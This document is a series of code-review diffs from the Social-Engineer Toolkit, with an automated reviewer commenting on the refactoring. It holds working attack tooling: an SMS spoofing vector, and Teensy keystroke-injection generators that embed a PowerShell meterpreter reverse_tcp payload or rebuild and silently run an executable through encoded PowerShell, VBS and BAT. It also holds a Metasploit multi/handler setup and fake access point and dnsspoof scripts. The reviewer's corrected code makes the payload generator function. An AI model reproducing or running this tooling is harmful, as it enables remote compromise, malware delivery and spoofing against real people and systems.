# note that the function for this is in a compiled python file with no source - this was done at the request of the third party we use since the API is not documented. I hand wrote the code and can validate its authenticity - it imports python requests and json and uses that to interact with the API. From a security standpoint if you are uncomfortable using this - feel free to ping me and I can walk you through what I do without giving away the API from the third party.
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
except ImportError:
print_error("Looks like you dont have python-requests installed. Please install (apt-get install python-requests) and try again.")
core.print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
print("Press {return} to continue.")
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
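Review bot: With `import requests` left as the only statement inside the `try`, the `except ImportError` branch prints the error and "Press {return} to continue." but then falls through, because nothing in the handler exits or returns and the prompt flow from the banner down to `send_sms(email, pw, ...)` now appears after the `try`/`except` instead of inside it; the user would be walked through entering account credentials before the missing dependency bites. Adding `sys.exit()` after the handler's print (with `import sys` at the top), or a `return` if this runs inside a function the hunk does not show, restores the earlier behaviour. Also `pw = input(core.setprompt(["7"], "Enter your password ..."))` echoes the account password to the terminal; `seproxy` in this same commit reads its password with `getpass.getpass`, and the same call fits here. Indentation is not preserved on this page, so the fall-through reading should be confirmed against the file.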



@ -1,8 +1,19 @@
#!/usr/bin/python
import pexpect
from src.core.setcore import *
# coding=utf-8
import os
import time
import pexpect
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
@ -13,45 +24,41 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode)
time.sleep(3)
fileopen = open(setdir + "/x86.powershell", "r")
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
pass
# read in x amount of bytes
data_read = int(50)
# read in x amount of bytes
data_read = int(50)
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
counter = 0
while True:
reading_encoded = fileopen.read(data_read).rstrip()
if not reading_encoded:
break
output_variable += "const char RevShell_{0}[] PROGMEM = '{1}';\n".format(counter, reading_encoded)
counter += 1
rev_counter = 0
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
output_variable += "RevShell_{0}".format(rev_counter)
rev_counter += 1
if rev_counter == counter:
output_variable += "};\n"
if rev_counter != counter:
else:
output_variable += ",\n"
teensy = output_variable
@ -142,36 +149,39 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
else:
port = input("Enter the port to connect back on: ")
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n"
"set payload {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set AutoRunScript post/windows/manage/smart_migrate\n"
"exploit -j".format(payload, ipaddr, port))
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "metasploit.answers")))
child.interact()
except:
pass
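Review bot: The `'w'` at L792 is passed to os.path.join rather than to open, so the shellcode file is opened read-only at `<setdir>/x86.powershell/w` and the write fails; L846 and L870 repeat the mistake and additionally start the joined component with `/`, which makes os.path.join discard core.setdir and target `/reports/teensy.pde` and `/metasploit.answers` at the filesystem root (L783 shows the correct pattern). The `with ... as fileopen: pass` at L796-797 closes the file immediately, so `fileopen.read(data_read)` at L814 raises on a closed file; the read loop has to sit inside the with block. The rewritten lines below leave the rest of the script as committed.
```python
with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
    filewrite.write(shellcode)
time.sleep(3)
# read in x amount of bytes
data_read = int(50)
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
# keep the file open for the whole chunked read
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
    while True:
        reading_encoded = fileopen.read(data_read).rstrip()
        if not reading_encoded:
            break
        output_variable += "const char RevShell_{0}[] PROGMEM = '{1}';\n".format(counter, reading_encoded)
        counter += 1
# … unchanged: exploit[] array assembly and teensy template …
with open(os.path.join(core.setdir, "reports", "teensy.pde"), "w") as filewrite:
    filewrite.write(teensy)
# … unchanged: listener prompt and option lookup …
with open(os.path.join(core.setdir, "metasploit.answers"), "w") as filewrite:
```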


@ -1,15 +1,14 @@
#!/usr/bin/python
import binascii
import base64
import sys
import binascii
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
@ -23,6 +22,13 @@ from src.core.menu.text import *
##########################################################################
##########################################################################
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# print main stuff for the application
print("""
********************************************************************
@ -48,43 +54,45 @@ print("""
enabled.\n""")
# grab the path and filename from user
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
fileopen = open(path, "rb")
data = fileopen.read()
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = open("converts.txt", "w")
filewrite.write(data)
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8, 15) + ".txt"
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
#
##########################################################################
@ -101,9 +109,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10, 15) + ".vbs"
vbs = core.generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10, 15) + ".bat"
bat = core.generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -118,9 +126,9 @@ void setup()
{
BlinkFast(2);
delay(5000);
CommandAtRunBar("cmd /c echo 0 > %%TEMP%%\\\\%s");
CommandAtRunBar("cmd /c echo 0 > %TEMP%\\\\{random_filename}");
delay(750);
CommandAtRunBar("notepad %%TEMP%%\\\\%s");
CommandAtRunBar("notepad %TEMP%\\\\{random_filename}");
delay(1000);
// Delete the 0
PRES(KEY_DELETE);
@ -132,11 +140,11 @@ void setup()
pinMode(10, OUTPUT);
// see if the card is present and can be initialized:
if (!SD.begin(chipSelect)) {
if (!SD.begin(chipSelect)) {{
Keyboard.println("Card failed, or not present");
// don't do anything more:
return;
}
}}
// open the file. note that only one file can be open at a time,
// so you have to close this one before opening another.
@ -147,15 +155,15 @@ void setup()
File dataFile = SD.open("converts.txt");
if (dataFile) {
fileSize = dataFile.size();
for (filePos = 0; filePos <= fileSize; filePos++) {
for (filePos = 0; filePos <= fileSize; filePos++) {{
Keyboard.print(dataFile.read(),BYTE);
delay(10);
}
}}
dataFile.close();
}
else {
}}
else {{
Keyboard.println("error opening converts.txt");
}
}}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -166,45 +174,45 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
Keyboard.println("powershell -EncodedCommand {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
Keyboard.println("echo %%TEMP%%\\\\%s.exe > %%TEMP%%\\\\%s");
Keyboard.println("wscript %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
Keyboard.println("echo Set WshShell = Nothing >> %TEMP%\\\\{vbs}");
Keyboard.println("echo %TEMP%\\\\{random_filename}.exe > %TEMP%\\\\{bat}");
Keyboard.println("wscript %TEMP%\\\\{vbs}");
delay(1000);
Keyboard.println("exit");
}
void loop () {}
}}
void loop () {{}}
void BlinkFast(int BlinkRate){
int BlinkCounter=0;
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){{
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}
}
void AltF4(){
}}
}}
void AltF4(){{
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F4);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
void CtrlS(){
}}
void CtrlS(){{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
}}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
void CommandAtRunBar(char *SomeCommand){{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
@ -217,24 +225,21 @@ void CommandAtRunBar(char *SomeCommand){
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void PRES(int KeyCode){
}}
void PRES(int KeyCode){{
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
with open("teensy.pde", "w") as filewrite:
# write the teensy.pde file out
filewrite.write(output_variable)
print("""
Instructions:
@ -246,4 +251,4 @@ on.
Happy hacking.
""")
return_continue()
core.return_continue()
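Review bot: The template that starts at L989 is now rendered with `.format()` at L1112, but unchanged context lines still contain single braces — `{` at L991, `if (dataFile) {` at L1016 and `void BlinkFast(int BlinkRate){` at L1059 — and a lone brace makes str.format raise ValueError before teensy.pde is written. Each of them needs doubling like its neighbours (`{{`), and since the template spans several hunks the lines outside the visible context should be checked for the same thing (unless the rendered view dropped a changed line). Separately, `binascii.hexlify` at L947 and `base64.b64encode` at L981 return bytes on Python 3, so the text-mode write at L952 and the `{powershell_command}` substitution at L1040 only behave on Python 2 despite the compat shim added at L912-917; a `.decode("ascii")` on both results would keep the script correct on either interpreter.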


@ -1,34 +1,44 @@
#!/usr/bin/env python
# coding=utf-8
############################
#
# Teensy HID Attack Vector
#
############################
import sys
import re
import os
import subprocess
import datetime
from src.core.setcore import *
import os
import re
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# pull metasploit path
msf_path = meta_path()
msf_path = core.meta_path()
# check operating system
operating_system = check_os()
operating_system = core.check_os()
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
definepath = os.getcwd()
# define if use apache or not
apache = 0
apache = False
# open set_config here
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
with open("/etc/setoolkit/set.config") as fileopen:
apache_check = fileopen.readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
@ -43,49 +53,50 @@ for line in apache_check:
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
apache = True
# grab info from config file
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
with open(os.path.join(core.setdir, "teensy")) as fileopen:
counter = 0
payload_counter = 0
choice = None
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter += 1
if not os.path.isfile(setdir + "/teensy"):
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set()
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
with open(os.path.join("src/teensy", filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
@ -116,32 +127,47 @@ if choice == "13":
payload_counter = 0
# save our stuff here
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir,
"reports",
"teensy_{0}.pde".format(now))) +
core.bcolors.ENDC)
print(core.bcolors.GREEN +
'[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' +
core.bcolors.ENDC)
print(core.bcolors.RED +
"\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" +
core.bcolors.ENDC)
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
webclone_path = os.path.join(core.setdir, "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
if not apache:
subprocess.Popen("mkdir {0};"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path,
metasploit_exec_path,
os.path.join(webclone_path, "x.exe")),
shell=True).wait()
if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try:
if operating_system != "windows":
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
if not apache:
child.close()
child1.close()
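Review bot: In writefile (L1246-1247) the second path component `"/reports/teensy_{0}.pde"` begins with a separator, so os.path.join discards core.setdir and the sketch is written to `/reports/...` at the filesystem root, while the success message at L1268-1270 tells the user to look under `<setdir>/reports/`; it should be `open(os.path.join(core.setdir, "reports", "teensy_{0}.pde".format(now)), "w")`. At L1300 the apache branch now copies msf.exe into `webclone_path`, whereas the removed lines L1294-1295 copied it into `apache_path`, so the web server will not find `x.exe` in its document root; the destination should be `os.path.join(apache_path, "x.exe")`. The isfile check at L1232-1234 also still comes after the `with open(...)` at L1210, which would already have raised if the file were missing, so moving the check above the open is what makes the FATAL message reachable.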


@ -1,39 +1,43 @@
#!/usr/bin/env python
# coding=utf-8
import subprocess
from src.core.setcore import *
import src.core.setcore as core
#
# Simple python script to kill things created by the SET wifi attack vector
#
interface = input(
setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
interface = input(core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
print_status(
"Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (
interface), shell=True).wait()
core.print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;"
"rfkill block all;"
"rfkill unblock all;"
"modprobe rtl8187;"
"rfkill unblock all;"
"ifconfig {0} up".format(interface),
shell=True).wait()
print_status("Killing airbase-ng...")
core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
print_status("Killing dhcpd3 and dhclient3...")
core.print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()
print_status("Killing dnsspoof...")
core.print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
print_status("Turning off IP_forwarding...")
core.print_status("Turning off IP_forwarding...")
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait()
print_status("Killing monitor mode on mon0...")
core.print_status("Killing monitor mode on mon0...")
subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait()
print_status("Turning off monitor mode on wlan0...")
core.print_status("Turning off monitor mode on wlan0...")
subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait()
print_status("SET has stopped the wireless access point. ")
return_continue()
core.print_status("SET has stopped the wireless access point. ")
core.return_continue()
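Review bot: This script switches from `from src.core.setcore import *` to `import src.core.setcore as core` (L1324-1325) but, unlike the other files in this commit, does not add the `try: input = raw_input / except NameError: pass` shim, so on Python 2 the `input(...)` at L1331 evaluates the typed interface name as an expression (a NameError for `wlan0`) if the star-import was what previously supplied a raw_input-backed `input`; the fake-AP script's prompt at L1438 has the same gap. Adding the same four-line shim after the imports keeps both scripts consistent with the rest of the change. Since `interface` is then spliced into a `shell=True` command at L1338-1344, issuing the final step as `subprocess.Popen(["ifconfig", interface, "up"]).wait()` would also keep a mistyped name from being interpreted by the shell.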


@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
##############################################
#
# This is a basic setup for an access point
@ -9,10 +10,9 @@
import sys
import os
import subprocess
import re
import pexpect
import time
from src.core.setcore import *
import src.core.setcore as core
from src.core.menu import text
sys.path.append("/etc/setoolkit")
@ -20,34 +20,30 @@ from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(definepath)
sys.path.append(core.definepath)
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
print_warning("isc-dhcp-server does not appear to be installed.")
print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
print_info("using SET's local airbase-ng binary")
core.print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning(
"If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
return_continue()
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE
@ -79,54 +75,50 @@ subnet 192.168.10.0 netmask 255.255.255.0 {
}
""")
show_fakeap_dhcp_menu = create_menu(
text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
